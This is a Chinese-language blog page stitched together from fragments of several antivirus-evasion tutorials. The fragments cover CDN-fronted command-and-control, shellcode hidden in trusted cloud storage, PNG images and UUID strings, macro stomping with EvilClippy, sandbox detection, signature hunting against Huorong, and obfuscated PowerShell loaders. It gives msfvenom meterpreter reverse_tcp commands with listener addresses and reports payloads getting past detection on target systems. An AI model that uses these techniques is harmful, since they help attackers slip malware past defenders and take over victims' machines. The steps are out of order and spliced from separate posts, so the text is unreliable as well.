xiaoheizi的博客

配置cdn，让木马远程连接的地址是我们域名上配置的cdn节点，就算拉黑某个cdn节点的ip，其他的cdn节点ip也会顶替上来，还是能够正常通信。当设置木马远程连接的地址是本机真实ip时，对方可以使用流量监测工具看到网络外联，当其拉黑ip后我们便不能正常通信了。在做shellcode分离时，如果从一个不受信任的url加载shellcode，可能会被杀软检测拦截。使用阿里云的OSS存储，加载shellcode文件，那么url是阿里云的，是绿标网站，就会被杀软放行。将下图位置填写为设置cdn的域名。

编译：csc.exe /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs。5..将原生态宏文件cs.doc和经过踩踏的宏文件cs_EvilClippy.doc上传到恶意文件评测平台。4.点击开发工具——新建 宏——任意 宏名——宏的位置(之前新建的word文档)——创建。5.跳转到如下，将cs生成的宏代码写入——点击保存——取消。3.自定义功能区——勾选 开发工具——点击确定。

为了逃避沙箱/安全人员的检测，恶意软件使用了各类识别沙箱/虚拟机的技术，用于判断自身程序是否运行在沙箱/虚拟机中。其中比较有效的方案是动态沙箱检测技术，即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。3.将重新生成的受保护的exe程序再次使用ollydbg调试，可以看到已经不能正常调试了。4.将exe程序放到虚拟机中无法运行，证明代码成功检测出当前处在虚拟环境中。3.msf设置监听，在真机运行exe程序，msf成功上线。3.将exe程序上传到虚拟机，exe程序无法运行。

项目名称右键——打开项目位置——将反编译的dll源码复制进去。根据文件中的教程，选中文件——右键属性——如下图修改——点击应用。使用python执行如下代码，调用dll文件。lib=CDLL('生成的dll文件路径')选中dll源码拖入项目，工具就会自动加载源码。根据教程——继续打开asm文件的属性进行配置。打开asm文件，将所有的jmp语句删除。链接器——调试——生成调试信息——否。——代码生成——运行库——多线程。将生成的dll文件改名位krpt。预编译头——不使用预编译头。

1.将工具和exe程序放到环境中，启动程序，点击制作测试文件---选择exe程序，点击ok后会在工具目录下生成一个virtest.vir文件。因为目标使用的是火绒，所以我们自己搭建一个火绒环境，使用VirTest工具检测出exe程序的什么地方被火绒杀了。所以需要再次修改特征码处：将保存了00区间修改的exe程序拖入ollydbg工具中，搜索定位特征码汇编地址后四位。22.开启火绒检测，只保存了00区间修改的半成品被杀了。9.定位到特征码处，向下滑动一下，然后选中复制，将特征码的汇编地址保存起来。

shellcodeCallback.nim下载：https://github.com/5598ca98-f0c8-4594-befe-330b23c2b7c4。nimcrypto，在有nimcrypto.nimble文件的文件夹(一般在根目录)启动命令行，执行：nimble install。1.下载nimPNG，在有nimPNG.nimble文件的文件夹(一般在根目录)启动命令行，执行：nimble install。4.再次执行：./lsp.exe de 生成的图片.png shellcode文件 密码。

IP地址与MAC地址在计算机里都是以二进制表示的，IP地址是32位的，而MAC地址则是48位（6个字节）的。IPv4使用32位（4字节）地址。介绍：通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符，根据标准方法生成，不依赖中央机构的注册和分配，UUID具有唯一性。此shellcode转换uuid的方法还可以使用：C# Python2 Go 等语言的shellcode加载器实施免杀。2.使用32位的加载器执行，将uuid类型的shellcode放到如下加载器中。

无文件落地&分离拆分其实就是内存免杀，内存免杀是将shellcode直接加载进内存，由于没有文件落地，因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好，在申请内存时一般采用渐进式申请一块可读写内存，在运行时改为可执行，在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度，把shellcode从放在程序转移到加载进内存，把整块的shellcode通过分块传输的方法上传然后再拼接，这些体现了基本的”分离“思想。3.因为实战的时候不需要加密，所以就代码中的加密代码剔除，减少特征。

命令：msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui，将生成的msf.jar拖入其中进行反编译，点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起，将文件上传目标系统，成功绕过检测。命令：jar cvfm 名称.jar META-INF/MANIFEST.MF .

介绍：上传脚本到目标系统时，很容易就会被杀软将脚本反编译检测，所以将脚本使用ConfuserEx项目进行保护，防止杀软反编译检测。命令：msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=监听。命令：go build -ldflags "-s -w -H=windowsgui" 5.go。1.打开工具，将生成的exe程序拖入工具，然后如下图操作。执行文件，上传到目标系统，被火绒杀死。正常上传到目标系统，成功绕过检测。上传到目标系统，执行程序，

解码代码：$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了，这个火绒真的搞不懂，只经过base64编码的让过了，经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开，将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。

1.生成或者python2.打开pycharm工具，创建一个py文件，将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中，运行代码，cs成功上线1.执行命令，生成shellcode命令：msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。

shellcode是一段用于利用软件漏洞而执行的代码，shellcode为16进制的机器码，因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload，而这个payload里面就是一段十六进制的机器码。2.将shellcode放到执行脚本中(使用的调用执行方式是：申请动态内存加载)，利用C/C++语言编译成exe执行文件。因为shellcode的免杀手段多，损坏的可能性小，能自定义更多选择。3.将新的shellcode放到自写的执行脚本xor.cpp中，使用。